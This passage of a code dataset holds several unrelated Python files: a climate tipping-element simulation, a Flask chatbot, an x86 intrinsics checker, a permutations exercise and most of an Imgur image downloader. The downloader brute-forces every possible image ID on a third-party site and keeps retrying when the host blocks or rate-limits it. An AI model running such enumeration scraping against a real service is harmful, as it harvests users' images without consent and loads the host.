ev.get_timeseries()[1][-1, 3],\n                       net.get_number_tipped(ev.get_timeseries()[1][-1]),\n                       [net.get_tip_states(ev.get_timeseries()[1][-1])[0]].count(True), \n                       
[net.get_tip_states(ev.get_timeseries()[1][-1])[1]].count(True),\n [net.get_tip_states(ev.get_timeseries()[1][-1])[2]].count(True),\n [net.get_tip_states(ev.get_timeseries()[1][-1])[3]].count(True),\n root_x, effective_GMT\n ])\n\n \n #necessary for break condition\n if len(output) != 0:\n #saving structure\n data = np.array(output, dtype=object)\n\n saveGMT = data[-1]\n if(isinstance(saveGMT[-2],np.ndarray)):\n saveGMT[-2] = saveGMT[-2][0]\n\n np.savetxt(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/feedbacks_care{:.2f}_{:.2f}_{:.2f}_{:.2f}_{}.txt\".format(long_save_name, namefile, a, c, \n kk[0], kk[1], kk[2], a, c, strength, ets, avg_degree), saveGMT)\n time = data.T[0]\n state_gis = data.T[1]\n state_thc = data.T[2]\n state_wais = data.T[3]\n state_amaz = data.T[4]\n root_series = data.T[-2] #roots ????\n gmt_series = data.T[-1] #gmt series\n\n np.savetxt(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/feedbacks_care{:.2f}_{:.2f}_{:.2f}_{:.2f}_{}_gmt.txt\".format(long_save_name, namefile, a, c,\n kk[0], kk[1], kk[2], a, c, strength, ets, avg_degree), gmt_series)\n \n # np.savetxt(\"{}/{}_feedbacks/{}_{}/network_{}_{}_{}/feedbacks_care{}_{}_{:.2f}_{:.2f}_ALLROOTS.txt\".format(long_save_name, namefile, a, c,\n # kk[0], kk[1], kk[2], a, c, strength, ets), roots)\n\n #plotting structure\n fig = plt.figure()\n plt.grid(True)\n plt.title(\"Degree: {} A: {:.2f} C: {:.2f} ETS: {:.2f}\\n Wais to Thc:{} Amaz to Nino:{} Thc to Amaz:{}\".format(\n avg_degree, a, c, ets, kk[0], kk[1], kk[2]))\n plt.plot(time, state_gis, label=\"GIS\", color='c')\n plt.plot(time, state_thc, label=\"THC\", color='b')\n plt.plot(time, state_wais, label=\"WAIS\", color='k')\n plt.plot(time, state_amaz, label=\"AMAZ\", color='g')\n plt.xlabel(\"Time [yr]\")\n plt.ylabel(\"system feature f [a.u.]\")\n plt.legend(loc='best') # , ncol=5)\n fig.tight_layout()\n plt.savefig(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/feedbacks_care{:.2f}_{:.2f}_{:.2f}_{:.2f}_{}.pdf\".format(long_save_name, namefile, a, c,\n kk[0], kk[1], kk[2], a, c, strength, ets, avg_degree))\n #plt.show()\n plt.clf()\n plt.close()\n\n\n fig = plt.figure()\n plt.grid(True)\n plt.title(\"Degree: {} A: {:.2f} C: {:.2f} ETS: {:.2f}\\n Wais to Thc:{} Amaz to Nino:{} Thc to Amaz:{}\".format(\n avg_degree, a, c, ets, kk[0], kk[1], kk[2]))\n plt.plot(time, gmt_series, label=\"GMT\", color='r')\n plt.xlabel(\"Time [yr]\")\n plt.ylabel(\"$\\Delta$ GMT [°C]\")\n plt.legend(loc='best') # , ncol=5)\n fig.tight_layout()\n plt.savefig(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/gmtseries_care{:.2f}_{:.2f}_{:.2f}_{:.2f}_{}.pdf\".format(long_save_name, namefile, a, c,\n kk[0], kk[1], kk[2], a, c, strength, ets, avg_degree))\n #plt.show()\n plt.clf()\n plt.close()\n\n \n # **********************************\n fig, ax1 = plt.subplots()\n plt.grid(True)\n plt.title(\"Degree: {} A: {:.2f} C: {:.2f} ETS: {:.2f}\\n Wa to Thc:{} Am to Ni:{} Thc to Am:{}\".format(\n avg_degree, a, c, ets, kk[0], kk[1], kk[2]))\n ax1.set_xlabel(\"Time [yr]\")\n ax1.set_ylabel(\"Percentage\")\n plot1 = ax1.plot(time, firstRoot, label = \"active people\", color='r')\n plot2 = ax1.plot(time, numTipped, label = \"tipped elements\", color='g')\n\n ax2 = ax1.twinx()\n ax2.set_ylabel(\"GMT\", color = 'b')\n plot3 = ax2.plot(time, gmt_series, label=\"GMT\", color='b')\n #plt.legend(loc='best')\n lns = plot1 + plot2 + plot3\n labels = [l.get_label() for l in lns]\n plt.legend(lns, labels, loc=0)\n ax1.set_ylim(top = 1.25)\n ax2.set_ylim(top = 5)\n fig.tight_layout()\n 
plt.savefig(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/root_care{:.2f}_{:.2f}_{:.2f}_{:.2f}_{}.pdf\".format(long_save_name, namefile, a, c,\n kk[0], kk[1], kk[2], a, c, strength, ets, avg_degree))\n #plt.show()\n plt.clf()\n plt.close()\n \n \n #print(\"times: \", times)\n\n finalTemp.append(gmt_series[-1])\n finalTipped.append(numTipped[-1])\n finalActive.append(firstRoot[-1])\n\n#it is necessary to limit the amount of saved files\n#--> compose one pdf file for each network setting and remove the other time-files\ncurrent_dir = os.getcwd()\nos.chdir(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/\".format(long_save_name, namefile, a, c, kk[0], kk[1], kk[2]))\npdfs = np.array(np.sort(glob.glob(\"feedbacks_care{:.2f}_{:.2f}_*.pdf\".format(a, c)), axis=0))\nif len(pdfs) != 0.:\n merger = PdfFileMerger()\n for pdf in pdfs:\n merger.append(pdf)\n os.system(\"rm feedbacks_care{:.2f}_{:.2f}_*.pdf\".format(a, c))\n merger.write(\"feedbacks_complete_care{:.2f}_{:.2f}.pdf\".format(a, c))\n print(\"Complete PDFs merged - Part 1\")\n\npdfs = np.array(np.sort(glob.glob(\"gmtseries_care{:.2f}_{:.2f}_*.pdf\".format(a, c)), axis=0))\nif len(pdfs) != 0.:\n merger = PdfFileMerger()\n for pdf in pdfs:\n merger.append(pdf)\n os.system(\"rm gmtseries_care{:.2f}_{:.2f}_*.pdf\".format(a,c))\n merger.write(\"gmtseries_complete_care{:.2f}_{:.2f}.pdf\".format(a, c))\n print(\"Complete PDFs merged - Part 2\")\n\npdfs = np.array(np.sort(glob.glob(\"root_care{:.2f}_{:.2f}_*.pdf\".format(a, c)), axis=0))\nif len(pdfs) != 0.:\n merger = PdfFileMerger()\n for pdf in pdfs:\n merger.append(pdf)\n os.system(\"rm root_care{:.2f}_{:.2f}_*.pdf\".format(a, c))\n merger.write(\"root_complete_care{:.2f}_{:.2f}.pdf\".format(a, c))\n print(\"Complete PDFs merged - Part 3\")\n\nos.chdir(current_dir)\n\n\nnp.savetxt(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/feedbacks_care{:.2f}_{:.2f}_{:.2f}_finalTemps.txt\".format(long_save_name, namefile, a, c,\n kk[0], kk[1], kk[2], a, c, strength), finalTemp) \nnp.savetxt(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/feedbacks_care{:.2f}_{:.2f}_{:.2f}_finalTipped.txt\".format(long_save_name, namefile, a, c,\n kk[0], kk[1], kk[2], a, c, strength), finalTipped) \nnp.savetxt(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/feedbacks_care{:.2f}_{:.2f}_{:.2f}_finalActive.txt\".format(long_save_name, namefile, a, c,\n kk[0], kk[1], kk[2], a, c, strength), finalActive) \n\n\nfig, ax1 = plt.subplots()\nplt.grid(True)\nplt.title(\"A: {:.2f} C: {:.2f} ETS: {:.2f}\\n Wa to Thc:{} Am to Ni:{} Thc to Am:{}\".format(\n a, c, ets, kk[0], kk[1], kk[2]))\nax1.set_xlabel(\"Average Degree\")\nax1.set_ylabel(\"Percentage\")\nplot1 = ax1.plot(degrees, finalActive, label = \"active people\", color='r')\nplot2 = ax1.plot(degrees, finalTipped, label = \"tipped elements\", color='g')\n\nax2 = ax1.twinx()\nax2.set_ylabel(\"GMT\", color = 'b')\nplot3 = ax2.plot(degrees, finalTemp, label=\"GMT\", color='b')\n#plt.legend(loc='best')\nlns = plot1 + plot2 + plot3\nlabels = [l.get_label() for l in lns]\nplt.legend(lns, labels, loc=0)\n#ax1.set_ylim(top = 1.25)\n#ax2.set_ylim(top = 5)\nfig.tight_layout()\nplt.savefig(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/ALL_{:.2f}_{:.2f}_{:.2f}.pdf\".format(long_save_name, namefile, a, c,\n kk[0], kk[1], kk[2], a, c, strength))\n#plt.show()\nplt.clf()\nplt.close() \n\nprint(\"Finish\")\n#end = time.time()\n#print(\"Time elapsed until Finish: {}s\".format(end - 
start))","repo_name":"jasminezh1/granovetter_pycascades","sub_path":"MAIN_coupled.py","file_name":"MAIN_coupled.py","file_ext":"py","file_size_in_byte":19435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71762390873","text":"import flask\nfrom flask import Flask, render_template, request, jsonify\nimport requests\nimport json\nimport speech_recognition as sr\nfrom modules.chatbot import text_chatbot, semantic_search, get_response\nfrom modules.speech import speech_recognition\nfrom modules.facebook import send_facebook_messenger_message, send_instagram_message\nfrom flask_compress import Compress\n\napp = Flask(__name__)\nCompress(app)\n\n# recognizer instance used by process_audio below\nrecognizer = sr.Recognizer()\n\n@app.route(\"/\")\ndef index():\n    return render_template(\"index.html\")\n\n@app.route(\"/get_response\", methods=[\"POST\"])\ndef get_bot_response():\n    user_input = request.form[\"user_input\"]\n    response = get_response(user_input)\n    user_id = request.args.get(\"user_id\")\n    send_facebook_messenger_message(user_id, response)\n    send_instagram_message(user_id, response)\n\n    return jsonify({\"response\": response})\n\n@app.route(\"/process_audio\", methods=[\"POST\"])\ndef process_audio():\n    try:\n        audio = request.files['audio']\n        audio.save(\"user_audio.wav\")\n        with sr.AudioFile(\"user_audio.wav\") as source:\n            audio_data = recognizer.record(source)\n        try:\n            transcribed_text = recognizer.recognize_google(audio_data)\n            return transcribed_text\n        except sr.UnknownValueError:\n            return \"Sorry, I couldn't understand the recording.\"\n    except Exception as e:\n        print(\"Error processing audio:\", e)\n        return \"An error occurred while processing the audio.\"\n\nif __name__ == \"__main__\":\n    app.run(host=\"0.0.0.0\",port=5000)\n","repo_name":"Siddesh272/ChatAll","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"15156262830","text":"# -*- coding:UTF-8 -*-\nimport json\n\n\ndef i_filter(s):\n    return ''.join(c for c in s if c.isalnum())\n\n\ndef match_string(target, input_string):\n    input_words = input_string.lower().split()\n    for word in input_words:\n        if word == target:\n            return True\n    return False\n\n\nif __name__ == '__main__':\n    with open('intrinsics.db.output.json', 'r') as f:\n        intrinsics = json.load(f)\n    with open('instructions.db.output.json', 'r') as f:\n        instructions = json.load(f)\n    notFound = []\n    for intrinsic in intrinsics:\n        if 'instruction' in intrinsic and i_filter(intrinsic['instruction']) != '':\n            instruction = i_filter(intrinsic['instruction'])\n        else:\n            continue\n        found = False\n        for section in instructions:\n            instructionsInSection = section['instructions']\n            for i in instructionsInSection:\n                if i['mnemonic'].lower() == instruction:\n                    found = True\n                    break\n                table = i['data']['table']\n                for t in table:\n                    if t['type'] == 'table':\n                        items = t['value']['items']\n                        for item in items:\n                            if 'instruction' in item and match_string(instruction, item['instruction']):\n                                found = True\n                            if 'opcodeinstruction' in item and match_string(instruction, item['opcodeinstruction']):\n                                found = True\n                            if found:\n                                break\n                    if found:\n                        break\n            if found:\n                break\n        if not found:\n            if instruction not in notFound:\n                notFound.append(instruction)\n    print(str(len(notFound)) + ' instructions not found')\n    with open('notFound.output.json', 'w') as f:\n        json.dump(notFound, f, 
indent=2)\n","repo_name":"Akiko97/x86InstructionRefDB","sub_path":"check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"15665186622","text":"from itertools import permutations\n\nn, m = map(int, input().split())\n\narray = [i for i in range(1, n + 1)]\narray = list(permutations(array, m))\n\nfor i in array :\n for j in range(m) :\n print(i[j], end = ' ')\n print()","repo_name":"nyongja/BOJ","sub_path":"back_tracking/15649_N과M(1).py","file_name":"15649_N과M(1).py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2331160497","text":"# import sys\n\nimport datetime\nimport imghdr\nimport itertools\nimport os\nimport queue\nimport threading\nimport time\nimport uuid\nimport requests\n# import sqlite3 as sql\n# import ftplib\n\n\nfrom setup import setup_variables, create_database\nfrom dep.db_handler import DB_handler\n\n# Setup variables and SQLDB\nsettings = setup_variables()\nDB_finnished = create_database(settings)\n\nwhile True:\n if DB_finnished is True:\n break\n\n\nDB_Handler = DB_handler\n\n\n# Numbers used by update_terminal\nredirectFileLength = 0\nCheckedURLFileLength = 0\nErrorFileLength = 0\n\n\nwork_queue = queue.Queue(maxsize=settings[\"max_queue_size\"])\ndb_queue = queue.Queue(maxsize=settings[\"max_queue_size\"])\n\n# string_set = set() # create an empty set to store the strings\nthreads_amount = 0\ntotal_downloaded = 0\ntotal_tested = 0\narchive_files_amount = 0\ntotal_iterations = 0\narchive_files_size = \"\"\nlatest_string = \"\"\nlatest_string_from_File = \"\"\nErrorLogs = []\nStartedWork = False\n\ncurrent_workers = {}\n\n\ndef compare_files():\n archive_files = []\n checked_files = []\n\n # Get list of files in Archive folder\n for root, dirs, files in os.walk(settings[\"download_folder\"]):\n for file in files:\n archive_files.append(file)\n\n # Get list of files in checkedURLs.txt\n with open(settings[\"checked_url_filename\"], \"r\") as f:\n for line in f:\n checked_files.append(line.strip())\n\n # Find files that exist in checkedURLs.txt but not in Archive folder\n diff_files = set(checked_files) - set(archive_files)\n\n return diff_files\n\n\ndef sizeof_fmt(num, suffix=\"B\"):\n for unit in [\"\", \"Ki\", \"Mi\", \"Gi\", \"Ti\", \"Pi\", \"Ei\", \"Zi\"]:\n if abs(num) < 1024.0:\n return f\"{num:.1f} {unit}{suffix}\"\n num /= 1024.0\n return f\"{num:.1f} Yi{suffix}\"\n\n\ndef update_terminal():\n global current_workers\n global total_downloaded\n global total_tested\n global total_iterations\n global threads_amount\n global ErrorLogs\n global archive_files_amount\n global archive_files_size\n global redirectFileLength\n global CheckedURLFileLength\n global ErrorFileLength\n global latest_string\n global StartedWork\n global work_queue\n pppIterations = 0\n\n # estimated_latest_string = get_last_file_name(settings[\"download_folder\"])\n\n # estimated_latest_string = DB_Handler.fetch_last_combination()\n\n while True:\n try:\n # Create the header\n header = \"\\n\\n\\n\\n\\nIMGUR DOWNLOADER\\n\"\n header += f\"Last refresh: {datetime.datetime.now().strftime('%H:%M:%S')}\\n\"\n\n worker_rows = []\n workerBlock = \"\"\n\n # if StartedWork:\n if not settings[\"worker_print_disable\"]:\n\n if settings[\"worker_print_mini\"]:\n worker_rows.append(f\"Workers: {f'{len(current_workers)}'}\\n\")\n for worker in current_workers.values():\n workerBlock 
= (f\"{worker['WorkerID'][:8].upper()}: {worker['Current_Work']}, {worker['current_message']}\")\n \n if 'StringX' in worker:\n workerBlock += f\" -> {worker['StringX']}\"\n workerBlock += \"\\n\"\n \n worker_rows.append(workerBlock)\n\n elif settings[\"worker_print_summary\"]:\n jobs_summary = {}\n for worker in current_workers.values():\n if worker[\"Current_Work\"] in jobs_summary:\n jobs_summary[worker[\"Current_Work\"]] += 1\n else:\n jobs_summary[worker[\"Current_Work\"]] = 1\n for job in jobs_summary:\n worker_rows.append(f\"{job}: {jobs_summary[job]}\\n\")\n \n elif settings[\"worker_print_hide_check_links_workers\"]:\n workers_in_hiding = 0\n\n # Print how many workers exists\n worker_rows.append(f\"Total workers: {f'{len(current_workers)}'}\\n\")\n for worker in current_workers.values():\n #Filter out Check_links workers\n if worker[\"Current_Work\"] == \"check_links\":\n workers_in_hiding +=1\n continue\n\n workerStats = \"\"\n \n # Collect and append key values, filter out items in keys_to_ignore\n keys_to_ignore = (\"WorkerID\")\n for item in worker.keys():\n if item in keys_to_ignore:\n continue\n workerStats = workerStats + \\\n f\" {item}: {worker[item]}\\n\"\n\n # Initiate the section for this current worker\n workerBlock = (\n f\"Worker: {worker['WorkerID'][:8].upper()}\\n\" +\n workerStats + \"\\n\"\n )\n worker_rows.append(workerBlock)\n if workers_in_hiding >= 1:\n worker_rows.append(f\"\\nHiding {workers_in_hiding} workers.\")\n else:\n for worker in current_workers.values():\n workerStats = \"\"\n worker_rows.append(\n f\"Workers: {f'{len(current_workers)}'}\\n\")\n keys_to_ignore = (\"WorkerID\")\n\n for item in worker.keys():\n if item in keys_to_ignore:\n continue\n workerStats = workerStats + \\\n f\" {item}: {worker[item]}\\n\"\n\n workerBlock = (\n f\"Worker: {worker['WorkerID'][:8].upper()}\\n\" +\n workerStats + \"\\n\"\n )\n worker_rows.append(workerBlock)\n\n # Add the totals row and footer\n totals = f'Current session downloads: {total_downloaded}\\n'\n totals += f'Current session URLs tested: {total_tested}\\n'\n totals += f'Number of threads: {len(current_workers)}\\n'\n totals += f'Queue length (work_queue): {work_queue.qsize()}\\n'\n totals += f'Queue length (db_queue): {db_queue.qsize()}\\n'\n totals += f'Queue max length: {work_queue.maxsize}\\n'\n totals += f'Download Folder: {settings[\"download_folder\"]}\\n'\n totals += f'Total iterations: {total_iterations}\\n'\n totals += f'Latest Iteration: {db_updater.fetch_last_combination()}\\n'\n totals += f'Iterations since last refresh: {total_iterations-pppIterations}\\n'\n # totals += f'Estimated latest string: {estimated_latest_string}\\n'\n totals += f'Lines in Error registry: {ErrorFileLength}'\n\n # totals += '\\n'\n # totals += f'Total number of files in archive folder: {str(archive_files_amount)}\\n' # See \"Stats.py\" for this info\n # totals += f'Total size of archive folder (in bytes): {archive_files_size}\\n'\n\n # Print the full status message\n # footer = []\n # for error in ErrorLogs:\n # footer.append(str(error) + \"\\n\")\n\n print(f\"{header}{totals}\\n{''.join(worker_rows)}\")\n\n # if len(footer) >= 1:\n # print(\"Last 3 Error messages:\\n\")\n # for error in footer[-3:]:\n # print(str(error) + \"\\n\")\n\n # write_last_info()\n pppIterations = total_iterations\n\n if StartedWork:\n time.sleep(0.5)\n else:\n time.sleep(5)\n\n except Exception as e:\n # print(e)\n write_error_string(error=e)\n raise Exception(e)\n # exit()\n\n\ndef get_last_file_name(directory):\n # Get a list of all 
files in the directory\n file_list = os.listdir(directory, )\n\n # Sort the files by name\n sorted_files = sorted(file_list)\n\n # Get the last file in the list\n last_folder_name = sorted_files[-1]\n\n file_list = os.listdir(f\"{directory}/{last_folder_name}\")\n\n # Sort the files by name\n sorted_files = sorted(file_list)\n\n # Get the last file in the list\n last_file_name = sorted_files[-1]\n return last_file_name.split(\".\")[0]\n\n\ndef fetch_checked_file(StringX):\n file_prefix = StringX[\n :-2\n ] # Use the first N-2 characters of the string as the prefix for the file name\n # Construct the file path using the prefix\n file_path = f'{settings[\"db_folder\"]}/{file_prefix}.txt'\n return file_path\n\n\n# def is_string_used_IO(StringX):\n# sub_folder = StringX[\n# :-2\n# ] # Use the first N-2 characters of the string as the prefix for the file name\n# file_path = (\n# # Construct the file path using the prefix\n# f'{settings[\"download_folder\"]}/{sub_folder}'\n# )\n\n# # temp = os.path.abspath(file_path)\n# # temp2 = os.listdir(os.path.abspath(file_path))\n# try:\n# # for filename in temp2:\n# for filename in os.listdir(os.path.abspath(file_path)):\n# if StringX in filename.split(\".\")[0]:\n# return True\n\n# return False\n# except FileNotFoundError:\n# return False\n\n\ndef is_string_used(string=\"\", firstRun=False):\n # TODO Convert this to use db_updater, if that works better.\n temp = DB_Handler.search_for_string(string)\n return temp\n\n\n# def write_string(string):\n\n# with open(fetch_checked_file(string), \"a+\") as f:\n# f.write(string + \"\\n\")\n# # with open(Checked_Strings_File, 'a') as f:\n# # f.write(string + '\\n')\n\n\ndef write_error_string(error=\"\", message=\"\", StringX=\"\"):\n if not os.path.isfile(settings[\"error_filename\"]):\n with open(settings[\"error_filename\"], \"w+\") as f:\n f.write(\"\")\n \n with open(settings[\"error_filename\"], \"a+\") as f:\n now = datetime.datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n\n f.write(f\"{current_time}: {message}. 
Error: {str(error)}\\n\")\n # if not StringX == \"\":\n # write_string(StringX)\n\n\n# def write_redirect_url(string):\n# with open(settings[\"redirect_urls_filename\"], \"a+\") as f:\n# f.write(string + \"\\n\")\n# write_string(string)\n\n\n# def write_retry_strings(string):\n# with open(settings[\"retry_filename\"], \"a+\") as f:\n# if string.endsWith(\"\\n\"):\n# f.write(string)\n# f.write(string + \"\\n\")\n# write_string(string)\n\n\n# def transfer_to_ftp():\n# session = ftplib.FTP('server.address.com','USERNAME','PASSWORD')\n# file = open('kitten.jpg','rb') # file to send\n# session.storbinary('STOR kitten.jpg', file) # send the file\n# file.close() # close file and FTP\n# session.quit()\n\n\ndef download_image(string, response, current_worker_info):\n global total_downloaded\n\n \n file_name = \"\"\n update_worker_status(\"Getting file extension\", current_worker_info)\n file_extension = get_file_extension(response)\n file_name = string + file_extension\n update_worker_status(\n f\"Got file extension and filename {file_name}\", current_worker_info\n )\n \n \n # Create folder to download inside.\n update_worker_status(\"Configurating Filepath\", current_worker_info)\n dir_name = os.path.join(settings[\"download_folder\"], file_name[:4])\n if not os.path.exists(dir_name):\n os.makedirs(dir_name, exist_ok=True)\n\n file_path = os.path.join(dir_name, file_name)\n\n update_worker_status(\"Writing image to file\", current_worker_info)\n try:\n with open(file_path, \"wb\") as f:\n f.write(response.content)\n # print(f\"Downloaded image {file_name}\")\n # write_string(string)\n except Exception as e:\n update_worker_status(f\"Error writing file: {e}\", current_worker_info)\n raise Exception\n # Collect some data about the image \n file_size = get_file_size(file_path)\n status_code = response.status_code\n \n\n\n db_queue.put({\"work_type\": \"submit_new_stringX\",\n \"StringX\": string,\n \"response_code\": int(status_code),\n \"was_image\": True,\n \"file_path\": file_path,\n \"file_size\": file_size,\n \"message\": \"Download_image\"\n })\n\n total_downloaded += 1\n\n\ndef get_file_extension(response):\n image_type = imghdr.what(None, h=response.content)\n if image_type:\n extension = \".\" + image_type\n else:\n extension = \".jpg\"\n return extension\n\n\n# def update_worker_status(message, workerID):\ndef update_worker_status(message, current_worker_info):\n global current_workers\n\n current_workers[current_worker_info[\"WorkerID\"]\n ][\"current_message\"] = message\n\ndef retrive_response(current_worker_info, StringX, recive_head = False, retries = 0, response=None):\n global total_tested\n if retries > 3:\n \n # try:\n update_worker_status(\n \"String failed. 
Writing down string and closing down.\",\n            current_worker_info,\n        )\n        db_queue.put({\n            \"work_type\": \"submit_new_stringX\",\n            \"message\": \"Error after trying 3 times.\",\n            \"response_code\": int(response.status_code) if response is not None else 0,\n            \"StringX\": StringX,\n        })\n        # write_string(StringX)\n        return \n    \n    try:\n        response_status = 0\n        update_worker_status(\n            f\"Connecting to URL, retries: {retries}\", current_worker_info\n        )\n\n        url = settings[\"url_base\"] + StringX + \".jpg\"\n        \n        if recive_head is True:\n            response = requests.head(url, allow_redirects=False, timeout=15)\n        else:\n            response = requests.get(url, allow_redirects=False, timeout=15)\n        \n        response_status = int(response.status_code)\n        update_worker_status(\n            f\"Finished connecting to URL, retries: {retries}\", current_worker_info\n        )\n\n    except requests.exceptions.SSLError:\n        update_worker_status(\n            f\"Got SSLError. String: {StringX}. Retries: {retries}\",\n            current_worker_info,\n        )\n        # We have been blocked by the host. Wait for a little bit and retry this request.\n        time.sleep(5)\n        retries += 1\n        return retrive_response(\n            current_worker_info=current_worker_info, StringX=StringX, recive_head=recive_head, retries=retries, response=response\n        )\n\n    except ConnectionError as e:\n        update_worker_status(\n            \"Got timeout. Adding to Retry list for later.\", current_worker_info\n        )\n        db_queue.put({\n            \"work_type\": \"submit_new_stringX\",\n            \"message\": f\"Got Timeout Error. Error: {e}\",\n            \"StringX\": StringX,\n            \"response_code\": int(response_status)\n        })\n        # write_retry_strings(StringX)\n        # DB_handler.submit_new_stringX(StringX=StringX, response_code=response_status, was_image=False)\n        pass\n    # except Exception as e:\n    #     update_worker_status(\n    #         \"Got Error. Writing down error, and continue.\", current_worker_info\n    #     )\n    #     write_error_string(\n    #         message=f\"Error with String {StringX}. Could not get response. Error: \\n{e}\",\n    #         StringX=StringX,\n    #     )\n    #     write_retry_strings(StringX)\n    #     pass\n\n    if response_status == 200: \n        update_worker_status( \"Got Status code 200. Downloading image. \", current_worker_info)\n        \n        \n\n    elif response_status == 302:\n        update_worker_status(\"Got Status code 302. Skip this URL \", current_worker_info)\n        db_queue.put({\n            \"work_type\": \"submit_new_stringX\",\n            \"StringX\": StringX,\n            \"was_image\": False,\n            \"response_code\": int(response_status),\n            \"message\": \"Status 302\"\n        })\n        total_tested += 1\n        return\n\n    elif response_status == 429:\n        retries += 1\n        # If the status is 429 (blocked by host), wait 90 seconds before trying again, then reset the retries counter.\n        if response.status_code == 429:\n            timeleft = 90\n            while True:\n                if timeleft <= 0:\n                    break\n                update_worker_status(f\"Got Status code {response_status}, blocked by host. Time until retry: {timeleft}\",current_worker_info,)\n                time.sleep(1)\n                timeleft -=1\n            \n            retries = 0\n            # We have been blocked by the host. Retry this request after the wait.\n            update_worker_status(f\"Got Status code {response_status}, blocked by host. Retries: {retries}\",current_worker_info,)\n            # time.sleep(5)\n            return retrive_response(\n                current_worker_info=current_worker_info, StringX=StringX, recive_head=recive_head, retries=retries, response=response\n            )\n\n    elif response_status == 104:\n        retries += 1\n        update_worker_status(\n            f\"Got Status code {response_status}, Connection Reset From Host. Retries: {retries}\",\n            current_worker_info,\n        )\n        # We have been blocked by the host. 
Wait for a little bit and retry this request.\n        time.sleep(5)\n        return retrive_response(\n            current_worker_info=current_worker_info, StringX=StringX, recive_head=recive_head, retries=retries, response=response\n        )\n\n    elif response_status == 500:\n        retries += 1\n        update_worker_status(\n            f\"Got Status code {response_status}, Connection Reset From Host. Retries: {retries}\",\n            current_worker_info,\n        )\n        # We have been blocked by the host. Wait for a little bit and retry this request.\n        time.sleep(5)\n        return retrive_response(\n            current_worker_info=current_worker_info, StringX=StringX, recive_head=recive_head, retries=retries, response=response\n        )\n    else: \n        retries += 1\n        update_worker_status(\n            f\"Got unknown status code: {response_status}. Writing down error, put String into file of strings to try later, then continue. Retries: {retries}\",\n            current_worker_info,\n        )\n        # write_error_string(f\"Error with String {StringX}. Got unknown Status code: {response_status}\")\n        # write_retry_strings(StringX)\n\n        time.sleep(5)\n        return retrive_response(\n            current_worker_info=current_worker_info, StringX=StringX, recive_head=recive_head, retries=retries, response=response\n        )\n    return response\n\n\ndef check_links(current_worker_info, retries=0, response=None):\n    global total_tested\n    # global current_workers\n    global ErrorLogs\n\n    global StartedWork\n    StartedWork = True\n\n    # Set string X from current_worker_info\n    StringX = current_worker_info[\"StringX\"]\n\n    # Get HEAD and check status_code\n    status = retrive_response(current_worker_info=current_worker_info, StringX=StringX, recive_head=True)\n    \n    if status is None:\n        return\n    # If 200 send response_content to Download Image\n    if status.status_code == 200: \n        response = retrive_response(current_worker_info=current_worker_info, StringX=StringX, recive_head=False)\n        if response is not None:\n            download_image(string=StringX,current_worker_info=current_worker_info, response=response)\n\ndef check_links_start(current_worker_info):\n    while True:\n        try:\n            current_worker_info[\"current_message\"] = \"Now I wait for a job from the Queue!\"\n            StringX = work_queue.get()\n            current_worker_info[\"StringX\"] = StringX\n            # current_worker_info[\"current_message\"] = f\"Got job with string {StringX}\"\n            update_worker_status(\n                f\"Got job with string {StringX}\", current_worker_info)\n            check_links(current_worker_info)\n        except Exception as e:\n            write_error_string(e)\n            raise Exception(e)\n\n\n\ndef get_file_length(file):\n    line_count = 0\n    with open(file, \"r\") as f:\n        for line in f:\n            line_count += 1\n    return line_count\n\n\ndef get_file_size(path):\n    temp = os.stat(path).st_size\n    return temp\n\n\ndef fetch_files_number_and_size():\n    while True:\n        try:\n            # Get total number of files and total size of archive folder\n            # global archive_files_amount\n            # global archive_files_size\n            # global redirectFileLength\n            # global CheckedURLFileLength\n            global ErrorFileLength\n\n            # archive_files_amount = 0\n\n            ErrorFileLength = get_file_length(settings[\"error_filename\"])\n            # avoid re-reading the file in a tight loop\n            time.sleep(5)\n\n        except Exception as e:\n            write_error_string(message=f\"Error updating stats: {e}\")\n            raise Exception(e)\n\n\ndef create_strings(current_worker_info):\n    global total_iterations\n    # global latest_string\n\n    iterations_this_run = settings[\"max_iterations_per_run\"]\n    try:\n\n        update_worker_status(message=\"Fetching latest generation from DB. (This takes some time on very large databases)\",current_worker_info=current_worker_info)\n        while True:\n            # latest_gen = db_queue.put(\"fetch_last_combination\")\n            latest_gen = db_updater.fetch_last_combination()\n            if latest_gen is not None:\n                break\n\n        update_worker_status(message=f\"Found latest gen: {latest_gen}. 
Will now try to catch up to latest_gen\",current_worker_info=current_worker_info)\n        Caught_up_to_previous_value = False\n        update_worker_status_delay = 50\n        for combination in itertools.product(settings[\"character_list\"], repeat=settings[\"generated_string_length\"]):\n            if Caught_up_to_previous_value is False:\n                update_worker_status_delay -=1\n                if update_worker_status_delay >= 0:\n                    update_worker_status(message=f\"Still catching up! I'm at: {combination}\",current_worker_info=current_worker_info)\n                \n                if latest_gen == ():\n                    Caught_up_to_previous_value = True\n                    pass\n                elif not combination == latest_gen:\n                    continue\n\n\n\n            Caught_up_to_previous_value = True\n            StringX = \"\".join(combination)\n\n            # latest_string = StringX\n            # if not Caught_up_to_previous_value:\n            #     print(f\"\\rCreating combination {StringX} \")\n            #     if StringX == latest_string_from_File:\n            #         print(\"Found Starting point!\")\n            #         Caught_up_to_previous_value = True\n            #     if latest_string_from_File == \"\":\n            #         pass\n            #     else:\n            #         continue\n\n            update_worker_status(\n                message=f\"I have made string {StringX}\",\n                